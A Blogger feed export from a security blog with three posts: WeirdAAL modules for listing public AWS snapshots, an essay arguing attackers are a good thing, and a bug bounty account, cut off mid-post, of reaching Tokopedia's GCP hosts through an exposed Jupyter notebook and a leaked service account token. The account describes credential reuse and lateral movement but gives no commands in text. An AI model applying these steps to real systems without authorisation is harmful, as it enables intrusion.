tag:blogger.com,1999:blog-85398801443477282382024-02-19T06:35:04.264-05:00Carnal0wnage BlogUnknownnoreply@blogger.comBlogger644125tag:blogger.com,1999:blog-8539880144347728238.post-66705822859014419572020-05-17T20:01:00.001-04:002020-05-17T20:03:25.316-04:00WeirdAAL update - get EC2 snapshotsI watched a good DEF CON video on abusing public AWS Snapshots<div><br /><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/-LGR63yCTts" width="320" youtube-src-id="-LGR63yCTts"></iframe></div><div><br /></div></div><div><a href="https://www.youtube.com/watch?v=-LGR63yCTts">https://www.youtube.com/watch?v=-LGR63yCTts</a></div><div><br /></div><div>I, of course, wanted to check this out. There are tens of thousands of public snapshots in the various regions. The talk outlines what you can do with these and Bishop Fox released a tool to do it <a href="https://github.com/BishopFox/dufflebag" target="_blank">https://github.com/BishopFox/dufflebag</a>. I wanted to script up a few weirdAAL modules to 1) for an AWS keypair you are testing check and see what snapshots you have available 2) for an AWS accountid list public snapshots. Useful for bug bounty or for monitoring your org for public snapshots. The account you are using will need at least <i>AmazonEC2ReadOnlyAccess </i>privileges.</div><div><br /></div><div>Screenshot of the 2nd function below</div><div><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh0fo0MrrOk8viDTB43-nU9TVyH98yNpA_7mrC1DBcZn_Pp9UQH0dSt3TozYpRF_ve6dLKtMMWlL9sPi8FoBGQOBZ-Zmbi5QTa4sAiJpBSBnQoiqF9-Q9_uOUBVNBoJqamCS4Rs7z6vxo/" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1202" data-original-width="2086" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh0fo0MrrOk8viDTB43-nU9TVyH98yNpA_7mrC1DBcZn_Pp9UQH0dSt3TozYpRF_ve6dLKtMMWlL9sPi8FoBGQOBZ-Zmbi5QTa4sAiJpBSBnQoiqF9-Q9_uOUBVNBoJqamCS4Rs7z6vxo/w640-h368/Screen+Shot+2020-05-17+at+7.38.16+PM.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">listing snapshots for a random AWS accountid</td></tr></tbody></table><div><br /></div><div>You can git clone or git pull to get the updated code from <a href="https://github.com/carnal0wnage/weirdAAL" target="_blank">https://github.com/carnal0wnage/weirdAAL</a></div><div><br /></div><div>If you just want to do it with the AWS CLI you can use the following shell script:</div><div><br /><script src="https://gist.github.com/carnal0wnage/255f26c95205881319e66ddf24cfc0ac.js"></script></div><div><br /></div><div><br /></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-40166957693066525442020-04-27T12:36:00.000-04:002020-04-28T15:08:44.740-04:00The Duality of Attackers - Or Why Bad Guys are a Good Thing™<div dir="ltr" id="docs-internal-guid-68f993f4-7fff-361a-b5d0-43ea2e8618f1" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">The Duality of Attackers - Or Why Bad Guys are a Good Thing™</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="vertical-align: baseline; white-space: pre-wrap;">It’s no secret I've been on a spiritual journey the last few years. I tell most people it’s fundamentally changed my life and how I look at the world. I’m also a hacker and I’m constantly thinking about how to apply metaphysical or spiritual concepts into my daily life. Because if they are true they should apply broadly and also to many aspects of our lives. One of the key things I’ve learned is that </span><span style="font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">perspective</span><span style="vertical-align: baseline; white-space: pre-wrap;"> drives an individual's opinion of a situation or event. Is something good? Is something bad? It all depends on the observer’s perspective of the situation.</span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">My first Battalion Commander in the Army when I was having my welcome to the unit meeting said something I've never forgotten. He said “On any given day it’s better to be a Soldier, a DA Civilian, or a Local National (I was in Belgium)”. This stuck with me ever since even though i didn't know what to call it at the time….perspective. </span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">In late 2019 the Irresponsible Open Source Tools (intentionally not linking) debate took over Infosec twitter for a few weeks. Ever since that time I've been thinking about - “Are attackers a good thing?” Not red teaming, not pentesting but straight up criminals. The real steal your shit type, not the point and laugh type, the wreck all your things, steal all the things, potentially end your business type attackers. There were several people basically stating life would be better if attackers did not exist and I wasn't so sure about this. </span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">TLDR; I think Yes, attackers are a Good™ thing or rather not a Bad™ thing because they force us to adapt and grow. Growth Through Struggle.</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">But first, definitions:</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Perspective</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">“The art of drawing solid objects on a two-dimensional surface so as to give the right impression of their height, width, depth, and position in relation to each other when viewed from a particular point.”</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">“A particular attitude toward or way of regarding something; a point of view.”</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="vertical-align: baseline; white-space: pre-wrap;">From: </span><a href="https://www.lexico.com/en/definition/perspective" style="text-decoration-line: none;"><span style="vertical-align: baseline; white-space: pre-wrap;">https://www.lexico.com/en/definition/perspective</span></a><span style="vertical-align: baseline; white-space: pre-wrap;"> </span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="vertical-align: baseline; white-space: pre-wrap;">Another way to think about perspective and how everyone can have their own is that “Everything (every person, place, thing, situation, event) is fundamentally neutral - they are neutral props with no built in meaning” [</span><a href="https://youtu.be/Cp0Vhayn8h8?t=142" style="text-decoration-line: none;"><span style="vertical-align: baseline; white-space: pre-wrap;">1</span></a><span style="vertical-align: baseline; white-space: pre-wrap;">] - the observer of the situation or event gives the event meaning.</span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">The meaning we put, the meaning we assign to these neutral things completely determines the effect that we get out of them. Every situation can be viewed in many different capacities and it solely depends upon how you perceive it and the association that you create with it and your beliefs about the situation or event.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">I'm currently fascinated with TV Shows that tackle this subject. <a href="https://en.wikipedia.org/wiki/Lucifer_(TV_series)" target="_blank">Lucifer</a> and <a href="https://en.wikipedia.org/wiki/Good_Omens_(TV_series)" target="_blank">Good Omens</a> come to mind where the idea that the "bad" guy is sometimes the good guy if you evaluate their actions and the "good" guy is the bad guy as dictated by their actions or listening to their superiors.</span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Duality</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="vertical-align: baseline; white-space: pre-wrap;">As hinted at by the word "dual" within it, </span><span style="font-style: italic; vertical-align: baseline; white-space: pre-wrap;">duality</span><span style="vertical-align: baseline; white-space: pre-wrap;"> refers to having two parts, often with opposite meanings, like the </span><span style="font-style: italic; vertical-align: baseline; white-space: pre-wrap;">duality</span><span style="vertical-align: baseline; white-space: pre-wrap;"> of good and evil.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">If there are two sides to a coin, metaphorically speaking, there's a duality. Peace and war, love and hate, up and down, and black and white are dualities. Another term for a duality is a dichotomy. Duality has technical meanings in geometry and physics. In geometry, duality refers to how points and planes have interchangeable roles in projective geometry. In physics, duality is the property of matter and electromagnetic radiation to be understood best through wave theory or particle theory.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="vertical-align: baseline; white-space: pre-wrap;">From: </span><a href="https://www.vocabulary.com/dictionary/duality" style="text-decoration-line: none;"><span style="vertical-align: baseline; white-space: pre-wrap;">https://www.vocabulary.com/dictionary/duality</span></a><span style="vertical-align: baseline; white-space: pre-wrap;"> </span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 0pt; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-style: italic; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">“Your truth is truth, my truth is truth, but your truth is not necessarily my truth.”</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<div dir="ltr" id="docs-internal-guid-cf3f27ed-7fff-0458-be92-f8319df1ee27" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Understanding and being aware of duality is vital to our human experience, as it allows us to see things from ‘both sides of the coin’ and better understand ourselves and others amid the collective. Most individual’s version of ‘truth’ culminates according to their past and current experiences, social conventions, and worldly views. To put it simply, duality is the nature in which everything holds opposing truths — all of which are true — at least in a relative sense.</span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">From: </span><a href="https://quantumstones.com/what-is-duality-the-doorway-to-all-truths/" style="text-decoration-line: none;"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://quantumstones.com/what-is-duality-the-doorway-to-all-truths/</span></a><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span></span><br />
<span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihbiFkeTUPaWfzB3MObH1OJupr2aK1d7C2GIyOS_J5Dv1RlcfOpw703NpiuZOzfV2PnMwFM2w3B4FqKp4RDcNnj6RSDQSb4KT_J28dBdpz4dVORE-k_F7nyduPK49liddQm6guAdcG3A0/s1600/buddha-demon.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"><img border="0" data-original-height="313" data-original-width="512" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihbiFkeTUPaWfzB3MObH1OJupr2aK1d7C2GIyOS_J5Dv1RlcfOpw703NpiuZOzfV2PnMwFM2w3B4FqKp4RDcNnj6RSDQSb4KT_J28dBdpz4dVORE-k_F7nyduPK49liddQm6guAdcG3A0/s320/buddha-demon.jpg" width="320" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">Buddha & The Demon - Perspective</span></td></tr>
</tbody></table>
<span style="white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Extra Reading on Duality</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://exploringyourmind.com/jekyll-and-hyde-duality-between-good-evil/" style="text-decoration-line: none;"><span style="color: black; font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">https://exploringyourmind.com/jekyll-and-hyde-duality-between-good-evil/</span></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">I’ll be honest, after a lifetime growing up in the United States worrying about the next foreign country boogeyman and over a decade in the Army where the primary motivation was giving soldiers someone to “hate” it’s been quite a journey to try to see things other than a binary right/wrong & good/evil, etc. The intersection and interdependence of good and evil manifested for me (and I think plenty of others) in the following way: we don’t feel we are good unless we are fighting against evil. It’s the American Way! We can feel comfortable and secure in our own goodness only by attacking and destroying the evil outside us. I was, and still am to an extent, looking for evil to vanquish. This interdependence is at the core of Infosec. Without APT groups, criminals, malware, and every other form of virtual boogeyman (aka “the other(s)” or “the bad guys”) most of us have no reason for our Infosec existence.</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">Thinking of everything as fundamentally neutral has helped me drop some, but not all, of my old vocabulary and has given me space to pause and to think about how I feel about issues at a micro level and macro level. Taking that pause allows me to understand that my perspective on the situation is entirely what matters and that another person could have a TOTALLY different perspective on the situation (and Infosec twitter shows me...quite frequently does).</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">Criminals, Attackers, Bad People, etc and their actions can have a multitude of perspectives.</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">Take a company that gets compromised so badly they go out of business. From the perspective of the company CEO this is BAD. From another perspective, perhaps of a competing company CEO, this is GOOD, from the perspective of the attacker they got what they wanted so (GOOD) perhaps a bonus is coming, perhaps their family gets to eat or maybe they just get another BTC in their nano ledger. In-house defenders have “failed their mission” and now are out of work or maybe this was the event that finally prompted management to spend that money they’ve been asking for. Perhaps their failures were so embarrassing they have made it by name in tech-crunch articles and their careers may be over or at least paused. Perhaps they “lost” but their response was good enough that the general public thinks things are ok inside the company anyway.</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">For Infosec, I’m going to make the case that attackers are GOOD; at least from my perspective (as every opinion piece is). But, I’ll attempt to lay out bullet points for rationale for my current perspective. The following can be summed as “Growth through struggle”:</span><br />
<span style="white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<br />
<ul>
<li><span style="white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Attackers force defenders to consistently up their game. Attackers constantly innovate to get around the current detection techniques and technologies.</span></span></li>
<li><span style="white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Attackers force Red Teams to up their game to keep up with their TTPs.</span></span></li>
<li><span style="white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Defenders force attackers and Red Teams to up their game to keep up with current defenses.</span></span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="vertical-align: baseline; white-space: pre-wrap;">Without virtual cyber boogeymen a </span><a href="https://cybersecurityventures.com/cybersecurity-market-report/" style="white-space: pre;"><span style="vertical-align: baseline; white-space: pre-wrap;">100+ billion dollar industry</span></a><span style="vertical-align: baseline; white-space: pre-wrap;"> would sell less product and be required to innovate less.</span></span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Attackers force visibility into their politics and perspectives through the investigations into their motivations and TTPs. </span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">They give a large portion of Infosec a “purpose”. I’ve dedicated the last 20 years of my life in various verticals of IT to “keep bad guys out” and I'm positive I'm not alone.</span></li>
</ul>
</div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">If you’ve made it this far. Thank you! I realize the title is a bit click-baity and not really in line with the idea of duality or perspective but no one would have read “attackers are fundamentally neutral.” Although my hope is that are open to exploring that perspective now. I welcome your thoughts on the subject.</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">CG</span></div>
Unknownnoreply@blogger.com6tag:blogger.com,1999:blog-8539880144347728238.post-25529881863597469602020-03-13T22:10:00.001-04:002020-03-24T15:56:05.127-04:00What is your GCP infra worth?...about ~$700 [Bugbounty]<br />
BugBounty story #bugbountytips<br />
<br />
A fixed but they didn't pay the bugbounty story...<br />
<br />
Timeline:<br />
<ul>
<li>reported 21 Oct 2019</li>
<li>validated at Critical 23 Oct 2019</li>
<li>validated as fixed 30 Oct 2019</li>
<li>Bounty amount stated (IDR 10.000.000 = ~700 USD) 12 Nov 2019</li>
<li>Information provided for payment 16 Nov 2019</li>
<li>13 March 2020 - Never paid - blog post posted</li>
<li>19 March 2020 - received bounty of $565.86</li>
</ul>
<br />
There are lots of applications that are SAAS - <a href="https://www.youtube.com/watch?v=JVCsy-T94k4&list=UUef0TWni8ghLcJphdmDBoxw" target="_blank">Shell as a Service</a>. Jupyter Notebook is one of these with its running code feature as well as its terminal functionality.<br />
<br />
While I was trolling shodan looking for vulnerable boxes i came across an open Jupyter notebook belonging to <a href="https://www.tokopedia.com/" target="_blank">Tokopedia</a>. This wasn't obvious at first , but it will become clear how I identified this as you check out the screenshots.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDOjBydLfdzwyMoLUkuXGk9kYocnO52GGjrl4Ma3RdVL9d-QUGPkXraLxxg_-TO4-_VrUg81QGsFyl2BG3frj31En1mZjhNSWeOMemoxCqX5tbVBMOGDH6u_NwzRUgJM9D8PA4SNnW5P0/s1600/notebooks-main-page.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="495" data-original-width="1600" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDOjBydLfdzwyMoLUkuXGk9kYocnO52GGjrl4Ma3RdVL9d-QUGPkXraLxxg_-TO4-_VrUg81QGsFyl2BG3frj31En1mZjhNSWeOMemoxCqX5tbVBMOGDH6u_NwzRUgJM9D8PA4SNnW5P0/s640/notebooks-main-page.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Open Jupyter notebook server</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
I did a post on what do do when you find a GCP key in a <a href="http://carnal0wnage.attackresearch.com/2019/01/i-found-gcp-service-account-tokennow.html" target="_blank">previous post</a><br />
<br />
This is especially important when people leave their GCP service account keys in folders<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2n08X8w7IInnbAzELcZjLZ6FAYnEvoS3OQi0_2Im_4nLevSkodPop1ykyI9u9aKvOIV54MdUHMITkN3e7Etwe1JtKv2zBpEhbI1Affi1A1gD7sP1T0ukhsuyHOGBikoGYraPOg4HyMtk/s1600/Screen+Shot+2020-01-06+at+7.42.19+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="130" data-original-width="1600" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2n08X8w7IInnbAzELcZjLZ6FAYnEvoS3OQi0_2Im_4nLevSkodPop1ykyI9u9aKvOIV54MdUHMITkN3e7Etwe1JtKv2zBpEhbI1Affi1A1gD7sP1T0ukhsuyHOGBikoGYraPOg4HyMtk/s640/Screen+Shot+2020-01-06+at+7.42.19+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">When you leave your service token in the folder for all to find/use</td></tr>
</tbody></table>
<br />
In this case it was base64 encoded - but easy to fix<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifaY4fiCJXbqMUcaR6yUvwZNnD0g3wEPRDp5x-chfMlQI6y_LMnxlVc8cgd6RxWkWdyaJP_0CNAIl-bu95XSJGLYrQLMcIse0C3x9yrk6gnlaRg5bLAiFYSx0gw6KZnHNcEQT1zNQkf3M/s1600/token-b64decode.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1440" data-original-width="1318" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifaY4fiCJXbqMUcaR6yUvwZNnD0g3wEPRDp5x-chfMlQI6y_LMnxlVc8cgd6RxWkWdyaJP_0CNAIl-bu95XSJGLYrQLMcIse0C3x9yrk6gnlaRg5bLAiFYSx0gw6KZnHNcEQT1zNQkf3M/s320/token-b64decode.png" width="292" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">service account token b64 decoded</td></tr>
</tbody></table>
It was also in the error output of one of the jupyter notebooks<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbgyaCobVBekZLeX8a4SrZHmQWMaEt-hR4orMKBiFTfzDwqY8ujECrV7IUUYr838sLghncrf6-czKGLF-6wvL_3j07IBUIVOaKKPNEs6KLa5BeDSaVb1ATi_Vf4NXa6VVnBlEeki2qRK4/s1600/creds-via-notebook-error.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="635" data-original-width="1600" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbgyaCobVBekZLeX8a4SrZHmQWMaEt-hR4orMKBiFTfzDwqY8ujECrV7IUUYr838sLghncrf6-czKGLF-6wvL_3j07IBUIVOaKKPNEs6KLa5BeDSaVb1ATi_Vf4NXa6VVnBlEeki2qRK4/s640/creds-via-notebook-error.png" width="640" /></a></div>
<br />
<br />
I had used the terminal to do some basic poking around to find the owner<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7FWyY-hPD5RDfZ-87y8IBiM5cBtkZUlonSvjzy4H_FfQLUZL3Sum-hLHEckr8HtGm8_S0_rxu_WtrzD6Qf-o49mLoTx75KACn9fOe0VUVOuND8d1BQcGGRIc5q4Qnv3ZtZWTW0BfPW0s/s1600/uname-a-tokepedia-jupyter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="283" data-original-width="1600" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7FWyY-hPD5RDfZ-87y8IBiM5cBtkZUlonSvjzy4H_FfQLUZL3Sum-hLHEckr8HtGm8_S0_rxu_WtrzD6Qf-o49mLoTx75KACn9fOe0VUVOuND8d1BQcGGRIc5q4Qnv3ZtZWTW0BfPW0s/s640/uname-a-tokepedia-jupyter.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1guzNQwRxBHKVGUnm8N88HWhqLhF7oNAvOLJoqONXTtQ3Gq8HdnSjuw6ZHyteWQuPXjqw3VK4DNcBzJMTfJ-j962LfOzJxFk6dPd2TOSndAHcVNAl3osDrASfTt1Rrzh92TK_7chxUy4/s1600/creds-via-jupyter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1022" data-original-width="1600" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1guzNQwRxBHKVGUnm8N88HWhqLhF7oNAvOLJoqONXTtQ3Gq8HdnSjuw6ZHyteWQuPXjqw3VK4DNcBzJMTfJ-j962LfOzJxFk6dPd2TOSndAHcVNAl3osDrASfTt1Rrzh92TK_7chxUy4/s640/creds-via-jupyter.png" width="640" /></a></div>
<span id="goog_513689851"></span><span id="goog_513689852"></span><br />
Once I identified it was owned by someone with a bug bounty program I figured it was ok to prove access and impact.<br />
<br />
Per the GCP blog post once you have the service account token you authenticate and interact with services your token has access to<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAm9S5leVr9SYE66HVrk31CDcCwQuwxhk6dyk-Ou6ueriO8N4_H81bXmAvJ6o9T5hmu5BUwSWBVM0jAR-WHP_KiAVKocERcwCyJthdmsAM6LPeKbwo1w7YMD8fYaJ2QTrQAplIHRHKvqE/s1600/tokepedia-gcp-compute-list.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="269" data-original-width="1600" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAm9S5leVr9SYE66HVrk31CDcCwQuwxhk6dyk-Ou6ueriO8N4_H81bXmAvJ6o9T5hmu5BUwSWBVM0jAR-WHP_KiAVKocERcwCyJthdmsAM6LPeKbwo1w7YMD8fYaJ2QTrQAplIHRHKvqE/s640/tokepedia-gcp-compute-list.png" width="640" /></a></div>
<br />
The handy thing about getting a shell on a GCP compute host is that all the GCP utils are installed and "just work" I actually didn't need to do anything from an external host I was able to start ssh'ing to other hosts from within the jupyter terminal.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_4G7yZi8lC7J0g5H7NzD7Bnn9jhzHyKxTkYKNzr-WSyAC2a37TxjN5v8o-12v7az9bo1iKyrWt-RK5fYXuA47aY90i8pQMa59_tuaT9zBRZ4WZgxQ6xbJRlQPYAeUyvC7XkaGaRABS9Y/s1600/ssh+to+seonper-1-from-jupyter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="952" data-original-width="1600" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_4G7yZi8lC7J0g5H7NzD7Bnn9jhzHyKxTkYKNzr-WSyAC2a37TxjN5v8o-12v7az9bo1iKyrWt-RK5fYXuA47aY90i8pQMa59_tuaT9zBRZ4WZgxQ6xbJRlQPYAeUyvC7XkaGaRABS9Y/s640/ssh+to+seonper-1-from-jupyter.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
